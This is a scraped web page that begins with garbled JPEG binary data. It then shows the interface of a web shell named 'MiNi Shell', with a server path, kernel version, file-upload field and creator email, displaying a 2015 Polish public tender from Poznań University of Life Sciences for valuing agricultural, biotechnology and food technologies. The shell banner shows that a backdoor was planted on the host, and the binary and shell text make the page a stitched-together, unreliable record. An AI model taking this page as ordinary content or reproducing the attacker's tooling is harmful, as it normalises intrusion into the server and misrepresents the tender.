JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20150305/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20150305/48130-N-2015.html

<p class="kh_header"><b>Poznań: Usługa wyceny i doradztwa w zakresie technologii i produktów opracowanych w ramach 3 projektów finansowanych z Programu Operacyjnego Innowacyjna Gospodarka - liczba części 3</b><br>
<b>Numer ogłoszenia: 48130 - 2015; data zamieszczenia: 05.03.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Przyrodniczy w Poznaniu , ul. Wojska Polskiego 28, 60-637 Poznań, woj. wielkopolskie, tel. 061 8487023, 8487043, faks 061 8487043, 8487145.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.au.poznan.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa wyceny i doradztwa w zakresie technologii i produktów opracowanych w ramach 3 projektów finansowanych z Programu Operacyjnego Innowacyjna Gospodarka - liczba części 3.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa wyceny i doradztwa w zakresie technologii i produktów opracowanych w ramach 3 projektów finansowanych w ramach Programu Operacyjnego Innowacyjna Gospodarka t.j
Część 1 (wycena 3 technologii i 1 oprogramowania dla sektora rolnego) - Projekt współfinansowany z Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Innowacyjna Gospodarka, 2007-2013 pt.: Opracowanie indeksu gatunkowego i optymalizacja technologii produkcji wybranych roślin energetycznych - POIG.01.03.01-00-132-08
Część 2 (wycena 6 technologii z zakresu biotechnologii) - Projekt współfinansowany z Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Innowacyjna Gospodarka, 2007-2013 pt.: Biotechnologiczna konwersja glicerolu do polioli i kwasów dikarboksylowych - POIG 01.01.02-00-074-09
Część 3 (wycena 34 technologii dla przemysłu spożywczego) - Projekt  współfinansowany z Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Innowacyjna Gospodarka, 2007-2013 pt.: Nowa żywność bioaktywna o zaprogramowanych właściwościach prozdrowotnych - POIG 01.01.02-00-061-09   Usługa o charakterze niepriorytetowym - kategoria 27.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust 1 pkt 6 ustawy Pzp, polegających na usługach tego samego rodzaju  w zakresie części 1,2,3  do wysokości 50 % zamówienia podstawowego dla danej części.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.40.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca składający ofertę winien dysponować wiedzą i doświadczeniem w realizacji usług określonych w przedmiocie zamówienia   . Na potwierdzenie spełniania tego warunku należy:
Złożyć wykaz zrealizowanych usług:
Dla części 1, 2 i 3 - wykażą co najmniej 3 usługi wyceny składników własności intelektualnej i przemysłowej zrealizowane dla uczelni wyższych lub instytutów badawczych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, wraz z załączeniem dowodów potwierdzających należyte wykonanie usług  wg załącznika nr 5.
Wykaz zrealizowanych usług wyceny należy złożyć odrębnie dla każdej części.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje osobą/osobami, które będą wykonywały przedmiotową usługę, wraz z informacjami na temat ich doświadczenia niezbędnego  do wykonania zamówienia w zakresie wyceny wartości technologii i produktów powstających w jednostkach naukowych. 
Zamawiający wymaga, aby osoby zadysponowane dla części 1,2,3, posiadały doświadczenie
nabyte poprzez realizację co najmniej 2 usług wyceny technologii w uczelni wyższej lub instytucie badawczym wg załącznika nr 6.
 Wykaz osób ze względu na zakres prac w poszczególnych częściach należy podać odrębnie dla każdej części przy czym:
1. Dla części 1 - minimum dwie osoby 
2. Dla części 2 - minimum dwie osoby
3. Dla części 3 - minimum trzy osoby</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie oświadczenia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz oferty- załącznik nr 1,
Wykaz zrealizowanych usług - załącznik nr 5,
Wykaz osób które będą uczestniczyć w wykonaniu zamówienia - załącznik nr 6,
Projekt umowy -  załącznik nr 7</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.up.poznan.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ można pobrać w formie papierowej od Zamawiającego w budynku Collegium Maximum Uniwersytetu Przyrodniczego ul. Wojska Polskiego 28, IV piętro pok. 407 w godz. 10:00 do 12:00.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.03.2015 godzina 09:00, miejsce: budynek  Collegium Maximum Uniwersytetu Przyrodniczego w Poznaniu ul. Wojska Polskiego 28, IV piętro pok. 407  Biuro Zamówień Publicznych.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykaz 3 technologii i 1 oprogramowania do wyceny:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Technologia uprawy buraka cukrowego z przeznaczeniem na bioetanol.
2.	Technologia uprawy mozgi trzcinowatej z przeznaczeniem na biogaz.
3.	Technologia uprawy mozgi trzcinowatej z przeznaczeniem na biogaz.
4.	Oprogramowanie komputerowe BIOPOWER - program komputerowy dostępny on-line do wyznaczenia optymalnej technologii produkcji badanych roślin uprawianych na cele energetyczne z uwzględnieniem aspektów klimatyczno-glebowych, ekologicznych oraz ekonomicznych.
Opis technologii uprawy (ad. 1,2,3):
Technologie uprawy roślin z przeznaczeniem na cele energetyczne zostały opracowane dla gospodarstw o powierzchni 15 ha UR, 35 ha UR, 130 ha UR, 600 ha UR, 1500 ha UR posiadających gleby różnej jakości (słabe, średnie, ciężkie) przy trzech poziomach intensywności (ekstensywnym, średniointensywnym i intensywnym) dla 5 makroregionów w Polsce. Opracowane technologie są bazą pozwalającą określić poziom opłacalności uprawy oraz poziom efektywności energetycznej.
W opisie procesu technologicznego zapisano w formie tabelarycznej zestaw wszystkich zabiegów wykonanych przy uprawie roślin wraz z informacjami o rodzaju wykorzystanych zestawów maszynowych, areale uprawy, wydajności i czasie pracy maszyn oraz ludzi, a także wykorzystane w procesie produkcji materiały takie jak nasiona, środki ochrony roślin.
Technologie uprawy będą wykorzystywane w przez rolników, plantatorów roślin energetycznych, grupy producentów oraz ośrodki doradztwa rolniczego. W wyniku korzystania z opracowanej technologii uprawy rolnicy będą mieli możliwość w zależności od wielkości gospodarstwa oraz warunków środowiskowych i ekonomicznych optymalizacji procesu uprawy i zwiększania opłacalności produkcji biomasy.
Według wiedzy autorów obecnie nie ma tak szczegółowo opracowanych kart technologicznych, które uwzględniają tak szeroką gamę czynników różnicujących poziom wykorzystania środków produkcji i maszyn w technologiach uprawy.

Opis oprogramowania komputerowego BIOPOWER (ad. 4):
Przedmiotem wyceny jest oprogramowanie skierowane do sektora rolniczego w szczególności do rolników, plantatorów roślin energetycznych, grup producentów rolnych czy ośrodków doradztwa rolniczego. W wyniku korzystania z oprogramowania użytkownicy mają możliwość optymalizacji technologii uprawy i opłacalności produkcji roślin z przeznaczeniem na cele energetyczne.
Oprogramowanie zapewnia m.in. możliwość analizy i warunków klimatyczno-glebowych do oceny opłacalności. Umożliwia ponadto uwzględnienie kosztów agrotechnicznych i określenie parametrów technologii uprawy. Dodatkowo zapewnia możliwość prognozowania plonowania dla warunków miejscowych z uwzględnieniem warunków środowiskowych. W konsekwencji możliwa jest prognoza opłacalności upraw i optymalizacji doboru roślin do lokalnych warunków użytkownika - rolnika.
Aktualnie brak jest takich kompleksowych rozwiązań na rynku jeśli chodzi o wspomaganie decyzji w zakresie uprawy rośliny z przeznaczeniem na cele energetyczne. Na rynku istnieją jedynie częściowe opracowania i kalkulatory na bazie arkusza kalkulacyjnego excel. Aplikacja będzie dostępna on-line..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.40.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.05.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykaz 6 technologii do wyceny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Technologia produkcji syropu erytrytolowego z glicerolu dla celów spożywczych
2.	Wytwarzanie kwasu bursztynowego metodą mikrobiologiczną z substratów mieszanych i jego oczyszczanie (z oddzielną wyceną etapu mikrobiologicznej biosyntezy oraz etapu wydzielania i oczyszczania produktu z cieczy pofermentacyjnych)
3.	Wytwarzanie kwasu bursztynowego metodą mikrobiologiczną z glicerolu 
4.	Mikrobiologiczna synteza 1,3-propanodiolu z glicerolu
5.	Technologia wydzielania i oczyszczania 1,3-propanodiolu z cieczy pofermentacyjnych
6.	Sposób otrzymywania mikrokapsułek do immobilizacji mikroorganizmów stosowanych w procesach biotechnologicznych.
Opis technologii (ad. 1-6):
Przedmiotem wyceny są technologie przetwarzania odpadowego glicerolu po produkcji biodiesla na 1,3-propanodiol (1,3-PD), kwas bursztynowy (KB) i erytrytol.  Dwa pierwsze produkty mają zastosowanie głównie w przemyśle chemicznym do syntez polimerów, rozpuszczalników organicznych leków i tekstyliów, natomiast erytrytol ma zastosowanie głównie jako słodzik dla przemysłu spożywczego. Wszystkie wymienione technologie opierają się na procesach mikrobiologicznych, a wymienione produkty są końcowymi metabolitami mikroorganizmów. Technologie produkcji 1,3-propanodiolu i kwasu bursztynowego obejmują dwa etapy. Pierwszy z nich polega na procesie fermentacyjnym, w którym mikroorganizm produkcyjny przetwarza glicerol do wymienionych związków chemicznych w procesie biosyntezy. Drugim etapem jest wydzielanie i oczyszczanie produktów z cieczy pofermentacyjnych metodami technologii chemicznej. Podstawowym rynkiem dla sprzedaży 1,3-PD i KB  jest przemysł chemiczny. Przy produkcji erytrytolu, z uwagi na wysoką czystość produktu finalnego i nieszkodliwość zanieczyszczeń, przewidziano formę zagęszczonego syropu, który może być bezpośrednio dodawany do produktów spożywczych, szczególnie przeznaczonych dla diabetyków (chorych na cukrzycę). Znaczna część opracowanych technologii została sprawdzona w skali półtechnicznej. 
Oddzielną technologią jest technologia immobilizacji bioaktywnych substancji (komórek mikroorganizmów, enzymów i aktywnych składników leków i żywności) w kapsułkach odznaczających się dużą wytrzymałością mechaniczną. Jej odbiorcami mogą być firmy biotechnologiczne, farmaceutyczne, spożywcze i chemiczne..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.40.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wykaz 34 technologii do wyceny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> A.	Żywność bioaktywna w jednostce chorobowej  otyłość.
Produkty zbożowe:
1.	Technologia produkcji chleba chrupkiego ze składnikami bioaktywnymi dla osób otyłych
2.	Technologia produkcji musli ze składnikami bioaktywnymi dla osób otyłych
3.	Technologia produkcji grissini ze składnikami bioaktywnymi dla osób otyłych
4.	Technologia produkcji makaronu ze składnikami bioaktywnymi dla osób otyłych
5.	Technologia produkcji wafli ryżowych ze składnikami bioaktywnymi dla osób otyłych
Koncentraty:
1.	Technologia produkcji owsianki instant ze składnikami bioaktywnymi dla osób otyłych
2.	Technologia produkcji kisielu ze składnikami bioaktywnymi dla osób otyłych

B.	Żywność bioaktywna w jednostce chorobowej anemia.
Produkty zbożowe: 
1.	Technologia produkcji chleba chrupkiego ze składnikami bioaktywnymi dla osób chorych na nieswoiste zapalenie jelit
2.	Technologia produkcji makaronu ze składnikami bioaktywnymi dla osób chorych na nieswoiste zapalenie jelit
3.	Technologia produkcji wafli ryżowych ze składnikami bioaktywnymi dla osób chorych na nieswoiste zapalenie jelit
Koncentraty:
1.	Technologia produkcji koncentratów deserów ze składnikami bioaktywnymi dla osób chorych na nieswoiste zapalenie jelit
2.	Technologia produkcji chleba bezglutenowego dla osób chorych na nieswoiste zapalenie jelit
Produkty mięsne:
1.	Technologia produkcji parówek ze składnikami bioaktywnymi dla osób chorych na nieswoiste zapalenie jelit
2.	Technologia produkcji pasztetu ze składnikami bioaktywnymi dla osób chorych na nieswoiste zapalenie jelit
3.	Technologia produkcji zupa krem drobiowa ze składnikami bioaktywnymi dla osób chorych na nieswoiste zapalenie jelit

C.	Żywność bioaktywna w jednostce chorobowej anemia.
Produkty zbożowe:
1.	Technologia produkcji chleba chrupkiego  ze składnikami bioaktywnymi dla osób chorych na nadciśnienie
2.	Technologia produkcji makaronu ze składnikami bioaktywnymi dla osób chorych na nadciśnienie
3.	Technologia produkcji ciastek ze składnikami bioaktywnymi dla osób chorych na nadciśnienie
Koncentraty:
1.	Technologia produkcji kisielu ze składnikami bioaktywnymi dla osób chorych na nadciśnienie
2.	Technologia produkcji zupy brokułowej ze składnikami bioaktywnymi dla osób chorych na nadciśnienie
Soki:
1.	Technologia produkcji soku owocowo-warzywnego ze składnikami bioaktywnymi dla osób chorych na nadciśnienie

D.	Żywność bioaktywna w jednostce chorobowej cukrzyca.
Produkty zbożowe:
1.	Technologia produkcji makaronu ze składnikami bioaktywnymi dla osób chorych na cukrzycę
2.	Technologia produkcji pieczywa cukierniczego ze składnikami bioaktywnymi dla osób chorych na cukrzycę
3.	Technologia produkcji pieczywa razowego ze składnikami bioaktywnymi dla osób chorych na cukrzycę
4.	Technologia produkcji chleba chrupkiego ze składnikami bioaktywnymi dla osób chorych na cukrzycę
Produkty mleczne:
1.	Technologia produkcji napoju mlecznego ze składnikami bioaktywnymi dla osób chorych na cukrzycę
2.	Technologia produkcji mleka skondensowanego ze składnikami bioaktywnymi dla osób chorych na cukrzycę
Koncentraty:
1.	Technologia produkcji zupy brokułowej ze składnikami bioaktywnymi dla osób chorych na cukrzycę
2.	Technologia produkcji kaszy instant ze składnikami bioaktywnymi dla osób chorych na cukrzycę
Produkty mięsne:
1.	Technologia produkcji pasztetu ze składnikami bioaktywnymi dla osób chorych na cukrzycę

E. Technologia przygotowania preparatu związków bioaktywnych z:
      1.	morwy do stosowania w żywności funkcjonalnej
      2.	herbaty żółtej do stosowania w żywności funkcjonalnej
      3.	soku z ziemniaka do stosowania w żywności funkcjonalnej
      4.	ferrytyny do stosowania w żywności funkcjonalnej

Opis technologii produkcji żywności prozdrowotnej (ad. A - E):
W świetle gwałtownego rozwoju rynku żywności funkcjonalnej oraz dążenia konsumentów do ogólnego dobrostanu szacuje się, że zainteresowanie rynku produktami żywnościowymi o ukierunkowanym działaniu jest potencjalnie wysokie. Z wywiadów prowadzonych z pacjentami wnioskuje się bardzo duże zainteresowanie oraz zdeklarowaną chęć zakupu produktów funkcjonalnych.
Rynek żywności funkcjonalnej cechuje się dużą intensywnością rozwoju, jednakże obecnie rynek jest ubogi w nowe technologie produktów żywnościowych o podobnych cechach funkcjonalnych oraz recepturach stworzonych na bazie składników o udokumentowanym działaniu prozdrowotnym.
Przedmiotowe technologie produkcji nowej żywności o walorach prozdrowotnych stanowią pakiety ukierunkowane do wykorzystania w dietoterapii wybranych jednostek chorobowych, jak: cukrzyca, nadciśnienie, nieswoiste zapalenie jelit / anemia oraz otyłość. Opracowane technologie posiadają unikalny skład recepturowy o niespotykanej dotąd zawartości roślinnych związków biologicznie aktywnych. Pakiety technologii obejmują wyroby różnych gałęzi technologii przemysłu spożywczego, w tym przede wszystkim: wyroby zbożowe, koncentraty spożywcze, przetwory owocowo-warzywne, wyroby mleczarskie oraz mięsne. Odrębną grupę produktów stanowią preparaty biologicznie aktywne, których pozyskiwanie jest udokumentowane odpowiednią technologią, które będą wykorzystywane do otrzymywania powyższych produktów.
Technologie produktów spożywczych o działaniu prozdrowotnym są produktami innowacyjnymi, w których zastosowano nowe składniki oraz receptury, zapewniające pożądane właściwości w ukierunkowanej interwencji dietetycznej wybranych jednostek chorobowych. Potencjalne obszary zainteresowania technologią to firmy produkcyjne sektora spożywczego oraz producenci preparatów roślinnych. Potencjalni odbiorcy produktów otrzymanych wg nowych technologii to indywidualni konsumenci oraz stowarzyszenia chorych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.40.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.05.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com